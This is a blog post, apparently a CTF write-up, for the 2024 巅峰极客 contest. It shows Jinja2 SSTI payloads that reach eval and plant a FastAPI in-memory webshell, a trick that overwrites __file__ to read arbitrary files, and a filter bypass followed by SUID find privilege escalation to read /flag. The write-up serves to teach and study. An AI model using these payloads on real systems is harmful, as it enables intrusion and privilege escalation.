

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/I.png">
  <link rel="icon" href="/img/I.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Infernity">
  <meta name="keywords" content="">
  
    <meta name="description" content="GoldenHornKing源码给了是很明显的ssti，在&#x2F;calc路由里传参calc_req，黑名单是不能有：数字、百分号、非ascii之外的字符。最烦的是这个access，原本是False，可以不用管，但是一旦成功执行一次代码，access就会变成True，这个环境就不能打了，所以我们最好还是在本地先去掉这个access，方便我们调试，先打通一遍，再打开环境尝试。 123456789">
<meta property="og:type" content="article">
<meta property="og:title" content="2024第七届巅峰极客部分wp">
<meta property="og:url" content="http://example.com/2024/08/25/2024%E7%AC%AC%E4%B8%83%E5%B1%8A%E5%B7%85%E5%B3%B0%E6%9E%81%E5%AE%A2%E9%83%A8%E5%88%86wp/index.html">
<meta property="og:site_name" content="Infernity&#39;s Blog">
<meta property="og:description" content="GoldenHornKing源码给了是很明显的ssti，在&#x2F;calc路由里传参calc_req，黑名单是不能有：数字、百分号、非ascii之外的字符。最烦的是这个access，原本是False，可以不用管，但是一旦成功执行一次代码，access就会变成True，这个环境就不能打了，所以我们最好还是在本地先去掉这个access，方便我们调试，先打通一遍，再打开环境尝试。 123456789">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/dfjk/dfjk.png">
<meta property="article:published_time" content="2024-08-25T02:03:00.000Z">
<meta property="article:modified_time" content="2025-01-20T02:34:44.823Z">
<meta property="article:author" content="Infernity">
<meta property="article:tag" content="WPs">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/dfjk/dfjk.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>2024第七届巅峰极客部分wp - Infernity&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":150,"cursorChar":"_","loop":true,"scope":["home"]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":"§"},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Infernity&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/friends/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>friends</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/background/19.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle">2024第七届巅峰极客部分wp</span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-08-25 10:03" pubdate>
          2024年8月25日 上午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          9 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">2024第七届巅峰极客部分wp</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="GoldenHornKing"><a href="#GoldenHornKing" class="headerlink" title="GoldenHornKing"></a>GoldenHornKing</h1><p>源码给了是很明显的ssti，在&#x2F;calc路由里传参calc_req，黑名单是不能有：<strong>数字、百分号、非ascii之外的字符</strong>。最烦的是这个access，原本是False，可以不用管，但是一旦成功执行一次代码，access就会变成True，这个环境就不能打了，所以我们最好还是在本地先去掉这个access，方便我们调试，先打通一遍，再打开环境尝试。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-meta">@app.get(<span class="hljs-params"><span class="hljs-string">&quot;/calc&quot;</span></span>)</span><br><span class="hljs-meta">@timeout_after(<span class="hljs-params"><span class="hljs-number">1</span></span>)</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">ssti</span>(<span class="hljs-params">calc_req: <span class="hljs-built_in">str</span></span>):<br>    <span class="hljs-keyword">global</span> access<br>    <span class="hljs-keyword">if</span> (<span class="hljs-built_in">any</span>(char.isdigit() <span class="hljs-keyword">for</span> char <span class="hljs-keyword">in</span> calc_req)) <span class="hljs-keyword">or</span> (<span class="hljs-string">&quot;%&quot;</span> <span class="hljs-keyword">in</span> calc_req) <span class="hljs-keyword">or</span> <span class="hljs-keyword">not</span> calc_req.isascii() <span class="hljs-keyword">or</span> access:<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;bad char&quot;</span><br>    <span class="hljs-keyword">else</span>:<br>        jinja2.Environment(loader=jinja2.BaseLoader()).from_string(<span class="hljs-string">f&quot;&#123;&#123;&#123;&#123; <span class="hljs-subst">&#123;calc_req&#125;</span> &#125;&#125;&#125;&#125;&quot;</span>).render(&#123;<span class="hljs-string">&quot;app&quot;</span>: app&#125;)<br>        access = <span class="hljs-literal">True</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;fight&quot;</span><br></code></pre></td></tr></table></figure>

<p>这里calc_req参数外面给了四个大括号，这意味着我们传参不需要像ssti一样再传两对大括号进去了，直接可以打payload。</p>
<p>这里是没给回显的，除非你有read()所以我们只能通过服务器是否爆500来判断我们的payload是否有问题。</p>
<p>我们先拿eval：</p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scss">()<span class="hljs-selector-class">.__class__</span><span class="hljs-selector-class">.__base__</span><span class="hljs-selector-class">.__subclasses__</span>()<span class="hljs-selector-attr">[]</span><span class="hljs-selector-class">.__init__</span><span class="hljs-selector-class">.__globals__</span><span class="hljs-selector-attr">[<span class="hljs-string">&#x27;__builtins__&#x27;</span>]</span><span class="hljs-selector-attr">[<span class="hljs-string">&#x27;eval&#x27;</span>]</span><br></code></pre></td></tr></table></figure>

<p>这里使用 <code>.__subclasses__()</code> 后面配合 <code>[]</code> 可能更多地是选择了系统中第一个有 <code>__init__</code>、<code>__globals__</code> 的子类，因此不会导致错误。</p>
<p>这里还有一个拿eval的办法：</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc">app.<span class="hljs-emphasis">__init__</span>.<span class="hljs-emphasis">__globals__</span>.<span class="hljs-emphasis">__builtins__</span>.eval(&quot;1*1&quot;)<br></code></pre></td></tr></table></figure>

<p>因为代码前面app &#x3D; FastAPI()，app是FastAPI的一个对象，我们就可以直接调用app也就是FastAPI类的方法了。</p>
<p>拿到eval后，我们到现在这道题有两个做法：</p>
<p><strong>方法一：打内存马进行rce</strong></p>
<p>打FastAPI内存马，在FastAPI类有一个add_api_route方法，我们可以通过这个方法来增加一个路由，进行rce</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">app.add_api_route(<span class="hljs-string">&#x27;/shell&#x27;</span>, <span class="hljs-keyword">lambda</span>: <span class="hljs-built_in">__import__</span>(<span class="hljs-string">&#x27;os&#x27;</span>).popen(<span class="hljs-string">&#x27;whoami&#x27;</span>).read())<br></code></pre></td></tr></table></figure>

<p>我们需要再eval里重新获取一遍app也就是FastAPI的对象。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-built_in">__import__</span>(<span class="hljs-string">&#x27;sys&#x27;</span>).modules[<span class="hljs-string">&#x27;__main__&#x27;</span>].__dict__[<span class="hljs-string">&#x27;app&#x27;</span>]<br></code></pre></td></tr></table></figure>

<ol>
<li><code>sys.modules</code>：<code>sys</code> 模块中有一个名为 <code>modules</code> 的字典，它维护了所有已导入模块的当前状态。这个字典的键是模块的名称，而值是对应的模块对象。</li>
<li><code>modules[&#39;__main__&#39;]</code>：<code>__main__</code> 是运行 Python 程序的主模块，无论是直接从命令行运行的脚本，还是通过某个执行环境运行的代码。通过 <code>sys.modules[&#39;__main__&#39;]</code>，我们获取到了当前执行程序的主模块对象。</li>
<li><code>__dict__</code>：每个模块对象都有一个 <code>__dict__</code> 属性，它是一个字典，包含了模块内定义的所有全局变量和函数。</li>
<li><code>[&#39;app&#39;]</code>：最后，从模块的 <code>__dict__</code> 中获取名为 <code>app</code> 的对象。</li>
</ol>
<p>然后整合以下payload：</p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scss">app<span class="hljs-selector-class">.__init__</span><span class="hljs-selector-class">.__globals__</span><span class="hljs-selector-class">.__builtins__</span><span class="hljs-selector-class">.eval</span>(&quot;__import__(&#x27;sys&#x27;)<span class="hljs-selector-class">.modules</span><span class="hljs-selector-attr">[<span class="hljs-string">&#x27;__main__&#x27;</span>]</span><span class="hljs-selector-class">.__dict__</span><span class="hljs-selector-attr">[<span class="hljs-string">&#x27;app&#x27;</span>]</span><span class="hljs-selector-class">.add_api_route</span>(&#x27;/shell&#x27;, lambda :__import__(&#x27;os&#x27;)<span class="hljs-selector-class">.popen</span>(&#x27;cat /flag&#x27;)<span class="hljs-selector-class">.read</span>())&quot;)<br></code></pre></td></tr></table></figure>

<p>现在访问&#x2F;shell就可以拿到flag了</p>
<p><strong>方法二：修改__file__进行任意文件读取</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-meta">@app.get(<span class="hljs-params"><span class="hljs-string">&quot;/&quot;</span></span>)</span><br><span class="hljs-meta">@timeout_after(<span class="hljs-params"><span class="hljs-number">1</span></span>)</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>():<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">open</span>(__file__).read()<br></code></pre></td></tr></table></figure>

<p>在跟路由读取了当前代码文件内容，并输出到网页上。那么如果我们能修改<code>__file__</code>为&#x2F;flag那么访问根路由就能拿到flag了。</p>
<p><code>__file__</code>在全局变量globals里有</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-built_in">setattr</span>(<span class="hljs-built_in">__import__</span>(<span class="hljs-string">&#x27;sys&#x27;</span>).modules[<span class="hljs-string">&#x27;__main__&#x27;</span>],<span class="hljs-string">&#x27;__file__&#x27;</span>,<span class="hljs-string">&#x27;/flag&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>使用setattr(object, name, value)方法修改对象的属性值。</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs pgsql"><span class="hljs-keyword">object</span> <span class="hljs-comment">-- 对象。</span><br><span class="hljs-type">name</span> <span class="hljs-comment">-- 字符串，对象属性。</span><br><span class="hljs-keyword">value</span> <span class="hljs-comment">-- 属性值。</span><br></code></pre></td></tr></table></figure>

<blockquote>
<p>Q：为什么不用<code>__import__(&#39;sys&#39;).modules[&#39;__main__&#39;].__dict__</code>，<code>__file__</code>明明在这里面啊？</p>
<p>A：因为setattr函数的第一个值是一个对象，<code>__dict__</code>是<code>__main__</code>的一个属性，并不是一个对象。</p>
</blockquote>
<p>整合一下payload：</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">app.<span class="hljs-strong">__init__</span>.<span class="hljs-strong">__globals__</span>.<span class="hljs-strong">__builtins__</span>.eval(&quot;setattr(<span class="hljs-strong">__import__</span>(&#x27;sys&#x27;).modules[&#x27;<span class="hljs-strong">__main__</span>&#x27;],&#x27;<span class="hljs-strong">__file__</span>&#x27;,&#x27;/flag&#x27;)&quot;)<br></code></pre></td></tr></table></figure>

<h1 id="php-online"><a href="#php-online" class="headerlink" title="php_online"></a>php_online</h1><p><a target="_blank" rel="noopener" href="http://8.137.112.104/?p=15">http://8.137.112.104/?p=15</a></p>
<h1 id="admin-Test"><a href="#admin-Test" class="headerlink" title="admin_Test"></a>admin_Test</h1><p>扫后台发现&#x2F;admin.html，这里可以文件上传，并执行命令。</p>
<p><img src="/img/dfjk/QQ_1724744695876.png" srcset="/img/loading.gif" lazyload alt="QQ_1724744695876"></p>
<p>但是命令执行过滤了基本所有字符，留下的只有：</p>
<p>命令部分fuzz出来的可用字符为t * . &#x2F;</p>
<p>只能执行临时文件：</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc"><span class="hljs-bullet">. </span>/t*/*<br></code></pre></td></tr></table></figure>

<p><strong>通过.(点，也就是 source命令)去执行&#x2F;tmp目录里的文件</strong></p>
<p><img src="/img/dfjk/67a60b82f0a64abdb24b4041531f392b.png" srcset="/img/loading.gif" lazyload alt="67a60b82f0a64abdb24b4041531f392b"></p>
<p>flag没有权限读，尝试提权，发现find命令有suid权限：</p>
<p><img src="/img/dfjk/42dc5d58fe364771a2e7bb088d7266e4.png" srcset="/img/loading.gif" lazyload alt="42dc5d58fe364771a2e7bb088d7266e4"></p>
<p>直接find执行命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">find /etc/passwd -<span class="hljs-built_in">exec</span> <span class="hljs-built_in">cat</span> /flag \;<br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/WPs/" class="category-chain-item">WPs</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/WPs/" class="print-no-link">#WPs</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>2024第七届巅峰极客部分wp</div>
      <div>http://example.com/2024/08/25/2024第七届巅峰极客部分wp/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Infernity</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年8月25日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/08/25/NepCTF2024%E9%83%A8%E5%88%86web/" title="NepCTF2024部分web">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">NepCTF2024部分web</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/07/06/2024%E6%98%A5%E7%A7%8B%E6%9D%AF/" title="2024春秋杯部分wp">
                        <span class="hidden-mobile">2024春秋杯部分wp</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>





  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
